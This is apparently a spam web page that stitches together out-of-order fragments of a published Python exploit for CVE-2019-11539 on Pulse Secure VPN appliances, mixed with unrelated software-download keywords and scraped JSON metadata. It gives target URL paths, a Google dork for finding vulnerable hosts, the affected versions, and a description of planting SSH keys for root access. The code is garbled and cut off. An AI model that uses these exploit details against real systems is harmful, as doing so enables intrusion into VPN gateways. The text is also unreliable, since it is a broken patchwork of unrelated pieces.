![]() \n# \n# Imports \nimport requests \nimport urllib \nfrom bs4 import BeautifulSoup \n \n# Host information \nhost = '' # Host to exploit \nlogin_url = '/dana-na/auth/url_admin/login.cgi' # Login page \nCMDInjectURL = '/dana-admin/diag/diag. \n# We will not bail you out of jail, go to court, etc if you get caught using this maliciously. Please use this at your own discretion and with proper authrization. ![]() \n# \n# Reference: \n# Reference: \n# \n# Please Note, Alyssa or myself are not responsible with what is done with this code. Itunes 12.7 3 Download Mac Pulse Secure 5.0 3 Download Mac Download Roxio Toast For Mac Free How To Download Music For Imovie On Mac Amplitube Free Download Mac Adobe Drm Download Mac Java Version 7 Download Mac Data Rescue 4 Mac Download Russian Language Pack For Mac Itunes 10. \n# You will need your own configuration and authorized_keys files. Download Software Under Pulse Secure Centers, click on Licensing and Download Center. , "cvelist":, "modified": "T00:00:00", "id": "PACKETSTORM:154376", "href": "", "sourceData": "`#!/usr/bin/python \n# \n# Exploit Title: Pulse Secure Post-Auth Remote Code Execution \n# Google Dork: inurl:/dana-na/ filetype:cgi \n# Date: \n# Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera \n# Vendor Homepage: \n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n# Tested on: linux \n# CVE : CVE-2019-11539 \n# \n# Initial Discovery: Orange Tsai Meh Chang \n# \n# Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN \n# Downloads Modified SSH configuration and authorized_keys file to allow SSH as root.
0 Comments
Leave a Reply. |